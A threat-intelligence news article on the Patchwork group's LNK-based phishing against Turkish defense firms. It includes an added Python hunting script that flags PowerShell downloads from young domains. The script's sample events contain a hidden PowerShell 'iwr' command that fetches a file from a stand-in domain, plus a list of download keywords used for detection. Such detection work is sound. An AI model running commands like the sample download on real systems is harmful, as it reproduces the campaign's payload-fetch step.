Patchwork Cyber Group Targets Turkish Defense Sector in Sophisticated Phishing Campaign

The notorious hacking group known as Patchwork has launched a new spear-phishing campaign aimed at Turkish defense contractors, with intentions of gathering crucial intelligence, according to a report from Arctic Wolf Labs. This targeted operation primarily utilizes malicious LNK files disguised as conference invitations about unmanned vehicle systems.

The campaign uses a five-stage execution chain, which is particularly alarming given the geopolitical backdrop of increasing defense collaboration between Pakistan and Türkiye amid escalating India-Pakistan tensions. Notably, the campaign also focuses on an undisclosed manufacturer involved in precision-guided missile systems.

Patchwork, identified by multiple names including APT-C-09 and Dropping Elephant, is recognized as a state-sponsored threat actor with origins in India. This group has been active since at least 2009 and has a history of targeting organizations across South Asia, including in China and Pakistan. Recent activities have included attacks related to Chinese universities and sectors sensitive to national security, amplifying concerns regarding the group’s capabilities and strategic objectives.

The phishing attack works by having a malicious LNK file execute PowerShell commands that download payloads from a domain that was created just weeks ago. This reflects a calculated effort by Patchwork to adapt and refine its attack methods, and it underscores the importance of robust cybersecurity measures in the defense sector.
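The behaviour described above (a shortcut launching PowerShell that downloads from a recently registered domain) can be hunted for in process-creation logs. The following is an added example, not taken from the Arctic Wolf Labs report: the events, domains, dates and field names are constructed, and the explorer.exe parent check and the 30-day age threshold are assumptions.

```python
import re
from datetime import datetime, timedelta
from ntpath import basename  # parses Windows paths on any OS

DOWNLOAD_TOKENS = ("invoke-webrequest", "iwr ", "downloadfile", "downloadstring",
                   "net.webclient", "start-bitstransfer")
URL_HOST = re.compile(r"https?://([a-z0-9.-]+)", re.I)

# Constructed registration dates; in practice these come from WHOIS/RDAP enrichment.
DOMAIN_CREATED = {
    "conference-invite.example": datetime(2025, 6, 25),
    "vendor-updates.example": datetime(2016, 3, 1),
}

# Constructed process-creation events (field names are hypothetical).
EVENTS = [
    {"host": "WS-01", "time": datetime(2025, 7, 15), "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -w hidden -c "iwr https://files.conference-invite.example/a -OutFile $env:TEMP\a.bin"'},
    {"host": "WS-02", "time": datetime(2025, 7, 15), "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c Invoke-WebRequest https://cdn.vendor-updates.example/tool.zip -OutFile tool.zip"},
    {"host": "WS-03", "time": datetime(2025, 7, 15), "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c Get-ChildItem C:\\Users"},
]

def registered_domain(host):
    # Naive last-two-labels split (assumption); production code should use the Public Suffix List.
    return ".".join(host.lower().rstrip(".").split(".")[-2:])

def find_suspicious(events, created, max_age_days=30):
    """Flag PowerShell started from explorer.exe that downloads from a young domain."""
    hits = []
    for ev in events:
        cmd = ev["cmdline"].lower()
        if basename(ev["image"]).lower() not in ("powershell.exe", "pwsh.exe"):
            continue
        if basename(ev["parent"]).lower() != "explorer.exe":  # a double-clicked LNK runs under explorer.exe
            continue
        if not any(tok in cmd for tok in DOWNLOAD_TOKENS):
            continue
        for host in URL_HOST.findall(cmd):
            dom = registered_domain(host)
            born = created.get(dom)
            # A domain with no known registration date is treated as new (fail closed).
            if born is None or ev["time"] - born <= timedelta(days=max_age_days):
                hits.append((ev["host"], dom, None if born is None else (ev["time"] - born).days))
    return hits
```

On the constructed events only WS-01 is flagged: WS-02 downloads from a long-established domain and WS-03 runs no download command.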

To learn more about the report that details these activities, please visit Arctic Wolf Labs. For historical context regarding Patchwork’s activities, additional information can be found at The Hacker News detailing previous campaigns.

This recent escalation in cyber threats highlights the ongoing risk to national security posed by advanced persistent threats like Patchwork, necessitating heightened vigilance and preventive strategies within critical industry sectors.